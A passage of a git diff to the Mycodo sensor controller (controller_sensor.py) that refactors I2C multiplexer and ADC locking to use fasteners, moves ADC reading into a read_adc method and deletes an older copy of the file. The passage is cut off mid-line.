self.logger.warning( -- "Could not acquire lock for multiplexer. Error: " -- "{err}".format(err=lock_response)) -- self.updateSuccess = False -- return 1 -- self.logger.debug( -- "Setting multiplexer ({add}) to channel {chan}".format( -+ self.mux_lock_acquired = False -+ -+ for i in range(600): -+ self.mux_lock_acquired = self.mux_lock.acquire(blocking=False) -+ if self.mux_lock_acquired: -+ break -+ else: -+ time.sleep(0.1) -+ -+ if not self.mux_lock_acquired: -+ self.logger.error( -+ "Unable to acquire lock: {lock}".format(lock=self.mux_lock)) -+ -+ self.logger.debug( -+ "Setting multiplexer ({add}) to channel {chan}".format( -+ add=self.mux_address_string, -+ chan=self.mux_chan)) -+ -+ # Set multiplexer channel -+ (multiplexer_status, -+ multiplexer_response) = self.multiplexer.setup(self.mux_chan) -+ -+ if not multiplexer_status: -+ self.logger.warning( -+ "Could not set channel with multiplexer at address {add}." -+ " Error: {err}".format( - add=self.mux_address_string, -- chan=self.mux_chan)) -- # Set multiplexer channel -- (multiplexer_status, -- multiplexer_response) = self.multiplexer.setup(self.mux_chan) -- if not multiplexer_status: -- self.logger.warning( -- "Could not set channel with multiplexer at address {add}." -- " Error: {err}".format( -- add=self.mux_address_string, -- err=multiplexer_response)) -- self.updateSuccess = False -- return 1 -+ err=multiplexer_response)) -+ self.updateSuccess = False -+ return 1 - - def unlock_multiplexer(self): - """ Remove a multiplexer lock """ -- if self.multiplexer: -- self.release_lock(self.mux_address, self.mux_bus, self.mux_lock) -+ if self.mux_lock and self.mux_lock_acquired: -+ self.mux_lock.release() -+ -+ def read_adc(self, measurements): -+ """ Read voltage from ADC """ -+ try: -+ gotten = False -+ adc_lock = fasteners.InterProcessLock(self.adc_lock_file) -+ for i in range(600): -+ gotten = adc_lock.acquire(blocking=False) -+ if gotten: -+ break -+ else: -+ time.sleep(0.1) -+ if not gotten: -+ self.logger.error( -+ "Unable to acquire lock: {lock}".format( -+ lock=self.adc_lock_file)) -+ -+ # Get measurement from ADC -+ measurements = self.adc.next() -+ if measurements is not None: -+ # Get the voltage difference between min and max volts -+ diff_voltage = abs(self.adc_volts_max - self.adc_volts_min) -+ # Ensure the voltage stays within the min/max bounds -+ if measurements['voltage'] < self.adc_volts_min: -+ measured_voltage = self.adc_volts_min -+ elif measurements['voltage'] > self.adc_volts_max: -+ measured_voltage = self.adc_volts_max -+ else: -+ measured_voltage = measurements['voltage'] -+ # Calculate the percentage of the voltage difference -+ percent_diff = ((measured_voltage - self.adc_volts_min) / -+ diff_voltage) -+ -+ # Get the units difference between min and max units -+ diff_units = abs(self.adc_units_max - self.adc_units_min) -+ # Calculate the measured units from the percent difference -+ if self.adc_inverse_unit_scale: -+ converted_units = (self.adc_units_max - -+ (diff_units * percent_diff)) -+ else: -+ converted_units = (self.adc_units_min + -+ (diff_units * percent_diff)) -+ # Ensure the units stay within the min/max bounds -+ if converted_units < self.adc_units_min: -+ measurements[self.adc_measure] = self.adc_units_min -+ elif converted_units > self.adc_units_max: -+ measurements[self.adc_measure] = self.adc_units_max -+ else: -+ measurements[self.adc_measure] = converted_units -+ -+ if adc_lock and gotten: -+ adc_lock.release() -+ -+ except Exception as except_msg: -+ self.logger.exception( -+ "Error while attempting to read adc: {err}".format( -+ err=except_msg)) -+ return measurements - - def update_measure(self): - """ -@@ -728,62 +795,12 @@ class SensorController(threading.Thread): - self.updateSuccess = False - return 1 - -- self.lock_multiplexer() -+ # Lock multiplexer, if it's enabled -+ if self.multiplexer: -+ self.lock_multiplexer() - - if self.adc: -- try: -- # Acquire a lock for ADC -- (lock_status, -- lock_response) = self.setup_lock(self.i2c_address, -- self.i2c_bus, -- self.adc_lock_file) -- if not lock_status: -- self.logger.warning( -- "Could not acquire lock for multiplexer. Error: " -- "{err}".format(err=lock_response)) -- self.updateSuccess = False -- return 1 -- -- # Get measurement from ADC -- measurements = self.adc.next() -- if measurements is not None: -- # Get the voltage difference between min and max volts -- diff_voltage = abs(self.adc_volts_max - self.adc_volts_min) -- # Ensure the voltage stays within the min/max bounds -- if measurements['voltage'] < self.adc_volts_min: -- measured_voltage = self.adc_volts_min -- elif measurements['voltage'] > self.adc_volts_max: -- measured_voltage = self.adc_volts_max -- else: -- measured_voltage = measurements['voltage'] -- # Calculate the percentage of the voltage difference -- percent_diff = ((measured_voltage - self.adc_volts_min) / -- diff_voltage) -- -- # Get the units difference between min and max units -- diff_units = abs(self.adc_units_max - self.adc_units_min) -- # Calculate the measured units from the percent difference -- if self.adc_inverse_unit_scale: -- converted_units = (self.adc_units_max - -- (diff_units * percent_diff)) -- else: -- converted_units = (self.adc_units_min + -- (diff_units * percent_diff)) -- # Ensure the units stay within the min/max bounds -- if converted_units < self.adc_units_min: -- measurements[self.adc_measure] = self.adc_units_min -- elif converted_units > self.adc_units_max: -- measurements[self.adc_measure] = self.adc_units_max -- else: -- measurements[self.adc_measure] = converted_units -- except Exception as except_msg: -- self.logger.exception( -- "Error while attempting to read adc: {err}".format( -- err=except_msg)) -- finally: -- self.release_lock(self.i2c_address, -- self.i2c_bus, -- self.adc_lock_file) -+ measurements = self.read_adc(measurements) - else: - try: - # Get measurement from sensor -@@ -806,7 +823,8 @@ class SensorController(threading.Thread): - "Error while attempting to read sensor: {err}".format( - err=except_msg)) - -- self.unlock_multiplexer() -+ if self.multiplexer: -+ self.unlock_multiplexer() - - if self.device_recognized and measurements is not None: - self.measurement = Measurement(measurements) -@@ -816,53 +834,6 @@ class SensorController(threading.Thread): - - self.lastUpdate = time.time() - -- def setup_lock(self, i2c_address, i2c_bus, lockfile): -- execution_timer = timeit.default_timer() -- try: -- self.lock[lockfile] = LockFile(lockfile) -- while not self.lock[lockfile].i_am_locking(): -- try: -- self.logger.debug( -- "[Locking bus-{bus} 0x{i2c:02X}] Acquiring Lock: " -- "{lock}".format( -- bus=i2c_bus, -- i2c=i2c_address, -- lock=self.lock[lockfile].path)) -- # wait up to 60 seconds -- self.lock[lockfile].acquire(timeout=60) -- except Exception as e: -- self.logger.error( -- "{cls} raised an exception: {err}".format( -- cls=type(self).__name__, err=e)) -- self.logger.exception( -- "[Locking bus-{bus} 0x{i2c:02X}] Waited 60 seconds. " -- "Breaking lock to acquire {lock}".format( -- bus=i2c_bus, -- i2c=i2c_address, -- lock=self.lock[lockfile].path)) -- self.lock[lockfile].break_lock() -- self.lock[lockfile].acquire() -- self.logger.debug( -- "[Locking bus-{bus} 0x{i2c:02X}] Acquired Lock: " -- "{lock}".format( -- bus=i2c_bus, -- i2c=i2c_address, -- lock=self.lock[lockfile].path)) -- self.logger.debug( -- "[Locking bus-{bus} 0x{i2c:02X}] Executed in {ms:.1f} ms".format( -- bus=i2c_bus, -- i2c=i2c_address, -- ms=(timeit.default_timer()-execution_timer)*1000)) -- return 1, "Success" -- except Exception as msg: -- return 0, "Multiplexer Fail: {}".format(msg) -- -- def release_lock(self, i2c_address, i2c_bus, lockfile): -- self.logger.debug( -- "[Locking bus-{bus} 0x{i2c:02X}] Releasing Lock: {lock}".format( -- bus=i2c_bus, i2c=i2c_address, lock=lockfile)) -- self.lock[lockfile].release() -- - def get_last_measurement(self, measurement_type): - """ - Retrieve the latest sensor measurement diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.source.py deleted file mode 100644 index fb2fe70..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.source.py +++ /dev/null @@ -1,974 +0,0 @@ -# coding=utf-8 -# -# controller_sensor.py - Sensor controller that manages reading sensors and -# creating database entries -# -# Copyright (C) 2017 Kyle T. Gabriel -# -# This file is part of Mycodo -# -# Mycodo is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# Mycodo is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Mycodo. If not, see . -# -# Contact at kylegabriel.com - -import logging -import requests -import threading -import time -import timeit -import RPi.GPIO as GPIO -from lockfile import LockFile - -from mycodo_client import DaemonControl -from databases.models import Camera -from databases.models import Conditional -from databases.models import ConditionalActions -from databases.models import PID -from databases.models import Relay -from databases.models import Sensor -from databases.models import SMTP - -from devices.tca9548a import TCA9548A -from devices.ads1x15 import ADS1x15Read -from devices.mcp342x import MCP342xRead -from sensors.mycodo_ram import MycodoRam -from sensors.atlas_ph import AtlaspHSensor -from sensors.atlas_pt1000 import AtlasPT1000Sensor -from sensors.am2315 import AM2315Sensor -from sensors.bh1750 import BH1750Sensor -from sensors.bme280 import BME280Sensor -from sensors.bmp180 import BMP180Sensor -from sensors.bmp280 import BMP280Sensor -from sensors.chirp import ChirpSensor -from sensors.dht11 import DHT11Sensor -from sensors.dht22 import DHT22Sensor -from sensors.ds18b20 import DS18B20Sensor -from sensors.htu21d import HTU21DSensor -from sensors.k30 import K30Sensor -from sensors.linux_command import LinuxCommand -from sensors.mh_z16 import MHZ16Sensor -from sensors.mh_z19 import MHZ19Sensor -from sensors.raspi import RaspberryPiCPUTemp -from sensors.raspi_cpuload import RaspberryPiCPULoad -from sensors.raspi_freespace import RaspberryPiFreeSpace -from sensors.tmp006 import TMP006Sensor -from sensors.tsl2561 import TSL2561Sensor -from sensors.tsl2591_sensor import TSL2591Sensor -from sensors.sht1x_7x import SHT1x7xSensor -from sensors.sht2x import SHT2xSensor -from sensors.signal_pwm import PWMInput -from sensors.signal_rpm import RPMInput - -from devices.camera import camera_record -from utils.database import db_retrieve_table_daemon -from utils.influx import format_influxdb_data -from utils.influx import read_last_influxdb -from utils.influx import write_influxdb_list -from utils.influx import write_influxdb_value -from utils.send_data import send_email -from utils.system_pi import cmd_output - -from config import LIST_DEVICES_I2C - - -class Measurement: - """ - Class for holding all measurement values in a dictionary. - The dictionary is formatted in the following way: - - {'measurement type':measurement value} - - Measurement type: The environmental or physical condition - being measured, such as 'temperature', or 'pressure'. - - Measurement value: The actual measurement of the condition. - """ - - def __init__(self, raw_data): - self.rawData = raw_data - - @property - def values(self): - return self.rawData - - -class SensorController(threading.Thread): - """ - Class for controlling the sensor - - """ - def __init__(self, ready, sensor_id): - threading.Thread.__init__(self) - - self.logger = logging.getLogger( - "mycodo.sensor_{id}".format(id=sensor_id)) - - self.stop_iteration_counter = 0 - self.thread_startup_timer = timeit.default_timer() - self.thread_shutdown_timer = 0 - self.ready = ready - self.lock = {} - self.measurement = None - self.updateSuccess = False - self.sensor_id = sensor_id - self.control = DaemonControl() - self.pause_loop = False - self.verify_pause_loop = True - - self.cond_id = {} - self.cond_action_id = {} - self.cond_name = {} - self.cond_is_activated = {} - self.cond_if_sensor_period = {} - self.cond_if_sensor_measurement = {} - self.cond_if_sensor_edge_select = {} - self.cond_if_sensor_edge_detected = {} - self.cond_if_sensor_gpio_state = {} - self.cond_if_sensor_direction = {} - self.cond_if_sensor_setpoint = {} - self.cond_do_relay_id = {} - self.cond_do_relay_state = {} - self.cond_do_relay_duration = {} - self.cond_execute_command = {} - self.cond_email_notify = {} - self.cond_do_lcd_id = {} - self.cond_do_camera_id = {} - self.cond_timer = {} - self.smtp_wait_timer = {} - - self.setup_sensor_conditionals() - - sensor = db_retrieve_table_daemon(Sensor, device_id=self.sensor_id) - self.sensor_sel = sensor - self.unique_id = sensor.unique_id - self.i2c_bus = sensor.i2c_bus - self.location = sensor.location - self.power_relay_id = sensor.power_relay_id - self.measurements = sensor.measurements - self.device = sensor.device - self.interface = sensor.interface - self.device_loc = sensor.device_loc - self.baud_rate = sensor.baud_rate - self.period = sensor.period - self.resolution = sensor.resolution - self.sensitivity = sensor.sensitivity - self.cmd_command = sensor.cmd_command - self.cmd_measurement = sensor.cmd_measurement - self.cmd_measurement_units = sensor.cmd_measurement_units - self.mux_address_raw = sensor.multiplexer_address - self.mux_bus = sensor.multiplexer_bus - self.mux_chan = sensor.multiplexer_channel - self.adc_chan = sensor.adc_channel - self.adc_gain = sensor.adc_gain - self.adc_resolution = sensor.adc_resolution - self.adc_measure = sensor.adc_measure - self.adc_measure_units = sensor.adc_measure_units - self.adc_volts_min = sensor.adc_volts_min - self.adc_volts_max = sensor.adc_volts_max - self.adc_units_min = sensor.adc_units_min - self.adc_units_max = sensor.adc_units_max - self.adc_inverse_unit_scale = sensor.adc_inverse_unit_scale - self.sht_clock_pin = sensor.sht_clock_pin - self.sht_voltage = sensor.sht_voltage - - # Edge detection - self.switch_edge = sensor.switch_edge - self.switch_bouncetime = sensor.switch_bouncetime - self.switch_reset_period = sensor.switch_reset_period - - # PWM and RPM options - self.weighting = sensor.weighting - self.rpm_pulses_per_rev = sensor.rpm_pulses_per_rev - self.sample_time = sensor.sample_time - - # Relay that will activate prior to sensor read - self.pre_relay_id = sensor.pre_relay_id - self.pre_relay_duration = sensor.pre_relay_duration - self.pre_relay_setup = False - self.next_measurement = time.time() - self.get_new_measurement = False - self.trigger_cond = False - self.measurement_acquired = False - self.pre_relay_activated = False - self.pre_relay_timer = time.time() - - relay = db_retrieve_table_daemon(Relay, entry='all') - for each_relay in relay: # Check if relay ID actually exists - if each_relay.id == self.pre_relay_id and self.pre_relay_duration: - self.pre_relay_setup = True - - smtp = db_retrieve_table_daemon(SMTP, entry='first') - self.smtp_max_count = smtp.hourly_max - self.email_count = 0 - self.allowed_to_send_notice = True - - # Convert string I2C address to base-16 int - if self.device in LIST_DEVICES_I2C: - self.i2c_address = int(str(self.location), 16) - - # Set up multiplexer if enabled - if self.device in LIST_DEVICES_I2C and self.mux_address_raw: - self.mux_address_string = self.mux_address_raw - self.mux_address = int(str(self.mux_address_raw), 16) - self.mux_lock = "/var/lock/mycodo_multiplexer_0x{i2c:02X}.pid".format( - i2c=self.mux_address) - self.multiplexer = TCA9548A(self.mux_bus, self.mux_address) - else: - self.multiplexer = None - - if self.device in ['ADS1x15', 'MCP342x'] and self.location: - self.adc_lock_file = "/var/lock/mycodo_adc_bus{bus}_0x{i2c:02X}.pid".format( - bus=self.i2c_bus, i2c=self.i2c_address) - - # Set up edge detection of a GPIO pin - if self.device == 'EDGE': - if self.switch_edge == 'rising': - self.switch_edge_gpio = GPIO.RISING - elif self.switch_edge == 'falling': - self.switch_edge_gpio = GPIO.FALLING - else: - self.switch_edge_gpio = GPIO.BOTH - - self.lock_multiplexer() - - # Set up analog-to-digital converter - if self.device == 'ADS1x15': - self.adc = ADS1x15Read(self.i2c_address, self.i2c_bus, - self.adc_chan, self.adc_gain) - elif self.device == 'MCP342x': - self.adc = MCP342xRead(self.i2c_address, self.i2c_bus, - self.adc_chan, self.adc_gain, - self.adc_resolution) - else: - self.adc = None - - self.device_recognized = True - - # Set up sensors or devices - if self.device in ['EDGE', 'ADS1x15', 'MCP342x']: - self.measure_sensor = None - elif self.device == 'MYCODO_RAM': - self.measure_sensor = MycodoRam() - elif self.device == 'RPiCPULoad': - self.measure_sensor = RaspberryPiCPULoad() - elif self.device == 'RPi': - self.measure_sensor = RaspberryPiCPUTemp() - elif self.device == 'RPiFreeSpace': - self.measure_sensor = RaspberryPiFreeSpace(self.location) - elif self.device == 'AM2302': - self.measure_sensor = DHT22Sensor(self.sensor_id, - int(self.location)) - elif self.device == 'AM2315': - self.measure_sensor = AM2315Sensor(self.sensor_id, - self.i2c_bus, - power=self.power_relay_id) - elif self.device == 'ATLAS_PH_I2C': - self.measure_sensor = AtlaspHSensor(self.interface, - i2c_address=self.i2c_address, - i2c_bus=self.i2c_bus, - sensor_sel=self.sensor_sel) - elif self.device == 'ATLAS_PH_UART': - self.measure_sensor = AtlaspHSensor(self.interface, - device_loc=self.device_loc, - baud_rate=self.baud_rate, - sensor_sel=self.sensor_sel) - elif self.device == 'ATLAS_PT1000_I2C': - self.measure_sensor = AtlasPT1000Sensor(self.interface, - i2c_address=self.i2c_address, - i2c_bus=self.i2c_bus) - elif self.device == 'ATLAS_PT1000_UART': - self.measure_sensor = AtlasPT1000Sensor(self.interface, - device_loc=self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'BH1750': - self.measure_sensor = BH1750Sensor(self.i2c_address, - self.i2c_bus, - self.resolution, - self.sensitivity) - elif self.device == 'BME280': - self.measure_sensor = BME280Sensor(self.i2c_address, - self.i2c_bus) - # TODO: BMP is an old designation and will be removed in the future - elif self.device in ['BMP', 'BMP180']: - self.measure_sensor = BMP180Sensor(self.i2c_bus) - elif self.device == 'BMP280': - self.measure_sensor = BMP280Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'CHIRP': - self.measure_sensor = ChirpSensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'DS18B20': - self.measure_sensor = DS18B20Sensor(self.location) - elif self.device == 'DHT11': - self.measure_sensor = DHT11Sensor(self.sensor_id, - int(self.location), - power=self.power_relay_id) - elif self.device == 'DHT22': - self.measure_sensor = DHT22Sensor(self.sensor_id, - int(self.location), - power=self.power_relay_id) - elif self.device == 'HTU21D': - self.measure_sensor = HTU21DSensor(self.i2c_bus) - elif self.device == 'K30_UART': - self.measure_sensor = K30Sensor(self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'MH_Z16_I2C': - self.measure_sensor = MHZ16Sensor(self.interface, - i2c_address=self.i2c_address, - i2c_bus=self.i2c_bus) - elif self.device == 'MH_Z16_UART': - self.measure_sensor = MHZ16Sensor(self.interface, - device_loc=self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'MH_Z19_UART': - self.measure_sensor = MHZ19Sensor(self.device_loc, - baud_rate=self.baud_rate) - elif self.device == 'SHT1x_7x': - self.measure_sensor = SHT1x7xSensor(int(self.location), - self.sht_clock_pin, - self.sht_voltage) - elif self.device == 'SHT2x': - self.measure_sensor = SHT2xSensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'SIGNAL_PWM': - self.measure_sensor = PWMInput(int(self.location), - self.weighting, - self.sample_time) - elif self.device == 'SIGNAL_RPM': - self.measure_sensor = RPMInput(int(self.location), - self.weighting, - self.rpm_pulses_per_rev, - self.sample_time) - elif self.device == 'TMP006': - self.measure_sensor = TMP006Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'TSL2561': - self.measure_sensor = TSL2561Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'TSL2591': - self.measure_sensor = TSL2591Sensor(self.i2c_address, - self.i2c_bus) - elif self.device == 'LinuxCommand': - self.measure_sensor = LinuxCommand(self.cmd_command, - self.cmd_measurement) - else: - self.device_recognized = False - self.logger.debug("Device '{device}' not recognized".format( - device=self.device)) - raise Exception("'{device}' is not a valid device type.".format( - device=self.device)) - - self.unlock_multiplexer() - - self.edge_reset_timer = time.time() - self.sensor_timer = time.time() - self.running = False - self.lastUpdate = None - - def run(self): - try: - self.running = True - self.logger.info("Activated in {:.1f} ms".format( - (timeit.default_timer() - self.thread_startup_timer) * 1000)) - self.ready.set() - - # Set up edge detection - if self.device == 'EDGE': - GPIO.setmode(GPIO.BCM) - GPIO.setup(int(self.location), GPIO.IN) - GPIO.add_event_detect(int(self.location), - self.switch_edge_gpio, - callback=self.edge_detected, - bouncetime=self.switch_bouncetime) - - while self.running: - # Pause loop to modify conditional statements. - # Prevents execution of conditional while variables are - # being modified. - if self.pause_loop: - self.verify_pause_loop = True - while self.pause_loop: - time.sleep(0.1) - - if self.device not in ['EDGE']: - # Signal that a measurement needs to be obtained - if time.time() > self.next_measurement and not self.get_new_measurement: - self.get_new_measurement = True - self.trigger_cond = True - self.next_measurement = time.time() + self.period - - # if signaled and a pre relay is set up correctly, turn the - # relay on for the set duration - if (self.get_new_measurement and - self.pre_relay_setup and - not self.pre_relay_activated): - relay_on = threading.Thread( - target=self.control.relay_on, - args=(self.pre_relay_id, - self.pre_relay_duration,)) - relay_on.start() - self.pre_relay_activated = True - self.pre_relay_timer = time.time() + self.pre_relay_duration - - # If using a pre relay, wait for it to complete before - # querying the sensor for a measurement - if self.get_new_measurement: - if ((self.pre_relay_setup and - self.pre_relay_activated and - time.time() < self.pre_relay_timer) or - not self.pre_relay_setup): - # Get measurement(s) from sensor - self.update_measure() - # Add measurement(s) to influxdb - self.add_measure_influxdb() - self.pre_relay_activated = False - self.get_new_measurement = False - - for each_cond_id in self.cond_id: - if self.cond_is_activated[each_cond_id]: - # Check sensor conditional if it has been activated - if (self.device in ['EDGE'] and - self.cond_if_sensor_edge_select[each_cond_id] == 'state' and - time.time() > self.cond_timer[each_cond_id]): - # Inputs that are triggered (switch, reed, hall, etc.) - self.cond_timer[each_cond_id] = time.time() + self.cond_if_sensor_period[each_cond_id] - self.check_conditionals(each_cond_id) - elif ((not self.cond_timer[each_cond_id] and self.trigger_cond) or - time.time() > self.cond_timer[each_cond_id]): - # Inputs that are not triggered (sensors) - self.cond_timer[each_cond_id] = time.time() + self.cond_if_sensor_period[each_cond_id] - self.check_conditionals(each_cond_id) - - self.trigger_cond = False - - time.sleep(0.1) - - self.running = False - - if self.device == 'EDGE': - GPIO.setmode(GPIO.BCM) - GPIO.cleanup(int(self.location)) - - self.logger.info("Deactivated in {:.1f} ms".format( - (timeit.default_timer() - self.thread_shutdown_timer) * 1000)) - except requests.ConnectionError: - self.logger.error("Could not connect to influxdb. Check that it " - "is running and accepting connections") - except Exception as except_msg: - self.logger.exception("Error: {err}".format( - err=except_msg)) - - def add_measure_influxdb(self): - """ - Add a measurement entries to InfluxDB - - :rtype: None - """ - if self.updateSuccess: - data = [] - for each_measurement, each_value in self.measurement.values.items(): - data.append(format_influxdb_data(self.unique_id, - each_measurement, - each_value)) - write_db = threading.Thread( - target=write_influxdb_list, - args=(data,)) - write_db.start() - - def check_conditionals(self, cond_id): - """ - Check if any sensor conditional statements are activated and - execute their actions if the conditional is true. - - For example, if measured temperature is above 30C, notify me@gmail.com - - :rtype: None - - :param cond_id: ID of conditional to check - :type cond_id: str - """ - logger_cond = logging.getLogger("mycodo.sensor_cond_{id}".format( - id=cond_id)) - attachment_file = False - attachment_type = False - - cond = db_retrieve_table_daemon( - Conditional, device_id=cond_id, entry='first') - - message = u"[Sensor Conditional: {name} ({id})]".format( - name=cond.name, - id=cond_id) - - if cond.if_sensor_direction: - last_measurement = self.get_last_measurement( - cond.if_sensor_measurement) - if (last_measurement and - ((cond.if_sensor_direction == 'above' and - last_measurement > cond.if_sensor_setpoint) or - (cond.if_sensor_direction == 'below' and - last_measurement < cond.if_sensor_setpoint))): - - message += u" {meas}: {value} ".format( - meas=cond.if_sensor_measurement, - value=last_measurement) - if cond.if_sensor_direction == 'above': - message += "(>" - elif cond.if_sensor_direction == 'below': - message += "(<" - message += u" {sp} set value).".format( - sp=cond.if_sensor_setpoint) - else: - logger_cond.debug("Last measurement not found") - return 1 - elif cond.if_sensor_edge_detected: - if cond.if_sensor_edge_select == 'edge': - message += u" {edge} Edge Detected.".format( - edge=cond.if_sensor_edge_detected) - elif cond.if_sensor_edge_select == 'state': - if GPIO.input(int(self.location)) == cond.if_sensor_gpio_state: - message += u" {state} GPIO State Detected.".format( - state=cond.if_sensor_gpio_state) - else: - return 0 - - cond_actions = db_retrieve_table_daemon(ConditionalActions) - cond_actions = cond_actions.filter( - ConditionalActions.conditional_id == cond_id).all() - - for cond_action in cond_actions: - message += u" Conditional Action ({id}): {do_action}.".format( - id=cond_action.id, do_action=cond_action.do_action) - - # Actuate relay - if (cond_action.do_relay_id and - cond_action.do_relay_state in ['on', 'off']): - message += u" Turn relay {id} {state}".format( - id=cond_action.do_relay_id, - state=cond_action.do_relay_state) - if (cond_action.do_relay_state == 'on' and - cond_action.do_relay_duration): - message += u" for {sec} seconds".format( - sec=cond_action.do_relay_duration) - message += "." - relay_on_off = threading.Thread( - target=self.control.relay_on_off, - args=(cond_action.do_relay_id, - cond_action.do_relay_state,), - kwargs={'duration': cond_action.do_relay_duration}) - relay_on_off.start() - - # Execute command in shell - elif cond_action.do_action == 'command': - message += u" Execute '{com}' ".format( - com=cond_action.do_action_string) - - command_str = cond_action.do_action_string - for each_measurement, each_value in self.measurement.values.items(): - command_str = command_str.replace( - "((input_{var}))".format(var=each_measurement), str(each_value)) - command_str = command_str.replace( - "((input_location))", str(self.location)) - command_str = command_str.replace( - "((input_period))", str(self.cond_if_sensor_period[cond_id])) - _, _, cmd_status = cmd_output(command_str) - - message += u"(Status: {stat}).".format(stat=cmd_status) - - # Capture photo - elif cond_action.do_action in ['photo', 'photo_email']: - message += u" Capturing photo with camera ({id}).".format( - id=cond_action.do_camera_id) - camera_still = db_retrieve_table_daemon( - Camera, device_id=cond_action.do_camera_id) - attachment_file = camera_record('photo', camera_still) - - # Capture video - elif cond_action.do_action in ['video', 'video_email']: - message += u" Capturing video with camera ({id}).".format( - id=cond_action.do_camera_id) - camera_stream = db_retrieve_table_daemon( - Camera, device_id=cond_action.do_camera_id) - attachment_file = camera_record( - 'video', camera_stream, - duration_sec=cond_action.do_camera_duration) - - # Activate PID controller - elif cond_action.do_action == 'activate_pid': - message += u" Activate PID ({id}).".format( - id=cond_action.do_pid_id) - pid = db_retrieve_table_daemon( - PID, device_id=cond_action.do_pid_id, entry='first') - if pid.is_activated: - message += u" Notice: PID is already active!" - else: - activate_pid = threading.Thread( - target=self.control.controller_activate, - args=('PID', - cond_action.do_pid_id,)) - activate_pid.start() - - # Deactivate PID controller - elif cond_action.do_action == 'deactivate_pid': - message += u" Deactivate PID ({id}).".format( - id=cond_action.do_pid_id) - pid = db_retrieve_table_daemon( - PID, device_id=cond_action.do_pid_id, entry='first') - if not pid.is_activated: - message += u" Notice: PID is already inactive!" - else: - deactivate_pid = threading.Thread( - target=self.control.controller_deactivate, - args=('PID', - cond_action.do_pid_id,)) - deactivate_pid.start() - - elif cond_action.do_action in ['email', - 'photo_email', - 'video_email']: - if (self.email_count >= self.smtp_max_count and - time.time() < self.smtp_wait_timer[cond_id]): - self.allowed_to_send_notice = False - else: - if time.time() > self.smtp_wait_timer[cond_id]: - self.email_count = 0 - self.smtp_wait_timer[cond_id] = time.time() + 3600 - self.allowed_to_send_notice = True - self.email_count += 1 - - # If the emails per hour limit has not been exceeded - if self.allowed_to_send_notice: - message += u" Notify {email}.".format( - email=cond_action.do_action_string) - # attachment_type != False indicates to - # attach a photo or video - if cond_action.do_action == 'photo_email': - message += u" Photo attached to email." - attachment_type = 'still' - elif cond_action.do_action == 'video_email': - message += u" Video attached to email." - attachment_type = 'video' - - smtp = db_retrieve_table_daemon(SMTP, entry='first') - send_email(smtp.host, smtp.ssl, smtp.port, - smtp.user, smtp.passw, smtp.email_from, - cond_action.do_action_string, message, - attachment_file, attachment_type) - else: - logger_cond.debug( - "Wait {sec:.0f} seconds to email again.".format( - sec=self.smtp_wait_timer[cond_id]-time.time())) - - elif cond_action.do_action == 'flash_lcd': - message += u" Flashing LCD ({id}).".format( - id=cond_action.do_lcd_id) - start_flashing = threading.Thread( - target=self.control.flash_lcd, - args=(cond_action.do_lcd_id, 1,)) - start_flashing.start() - - logger_cond.debug(message) - - def lock_multiplexer(self): - """ Acquire a multiplexer lock """ - if self.multiplexer: - (lock_status, - lock_response) = self.setup_lock(self.mux_address, - self.mux_bus, - self.mux_lock) - if not lock_status: - self.logger.warning( - "Could not acquire lock for multiplexer. Error: " - "{err}".format(err=lock_response)) - self.updateSuccess = False - return 1 - self.logger.debug( - "Setting multiplexer ({add}) to channel {chan}".format( - add=self.mux_address_string, - chan=self.mux_chan)) - # Set multiplexer channel - (multiplexer_status, - multiplexer_response) = self.multiplexer.setup(self.mux_chan) - if not multiplexer_status: - self.logger.warning( - "Could not set channel with multiplexer at address {add}." - " Error: {err}".format( - add=self.mux_address_string, - err=multiplexer_response)) - self.updateSuccess = False - return 1 - - def unlock_multiplexer(self): - """ Remove a multiplexer lock """ - if self.multiplexer: - self.release_lock(self.mux_address, self.mux_bus, self.mux_lock) - - def update_measure(self): - """ - Retrieve measurement from sensor - - :return: None if success, 0 if fail - :rtype: int or None - """ - measurements = None - - if not self.device_recognized: - self.logger.debug("Device not recognized: {device}".format( - device=self.device)) - self.updateSuccess = False - return 1 - - self.lock_multiplexer() - - if self.adc: - try: - # Acquire a lock for ADC - (lock_status, - lock_response) = self.setup_lock(self.i2c_address, - self.i2c_bus, - self.adc_lock_file) - if not lock_status: - self.logger.warning( - "Could not acquire lock for multiplexer. Error: " - "{err}".format(err=lock_response)) - self.updateSuccess = False - return 1 - - # Get measurement from ADC - measurements = self.adc.next() - if measurements is not None: - # Get the voltage difference between min and max volts - diff_voltage = abs(self.adc_volts_max - self.adc_volts_min) - # Ensure the voltage stays within the min/max bounds - if measurements['voltage'] < self.adc_volts_min: - measured_voltage = self.adc_volts_min - elif measurements['voltage'] > self.adc_volts_max: - measured_voltage = self.adc_volts_max - else: - measured_voltage = measurements['voltage'] - # Calculate the percentage of the voltage difference - percent_diff = ((measured_voltage - self.adc_volts_min) / - diff_voltage) - - # Get the units difference between min and max units - diff_units = abs(self.adc_units_max - self.adc_units_min) - # Calculate the measured units from the percent difference - if self.adc_inverse_unit_scale: - converted_units = (self.adc_units_max - - (diff_units * percent_diff)) - else: - converted_units = (self.adc_units_min + - (diff_units * percent_diff)) - # Ensure the units stay within the min/max bounds - if converted_units < self.adc_units_min: - measurements[self.adc_measure] = self.adc_units_min - elif converted_units > self.adc_units_max: - measurements[self.adc_measure] = self.adc_units_max - else: - measurements[self.adc_measure] = converted_units - except Exception as except_msg: - self.logger.exception( - "Error while attempting to read adc: {err}".format( - err=except_msg)) - finally: - self.release_lock(self.i2c_address, - self.i2c_bus, - self.adc_lock_file) - else: - try: - # Get measurement from sensor - measurements = self.measure_sensor.next() - # Reset StopIteration counter on successful read - if 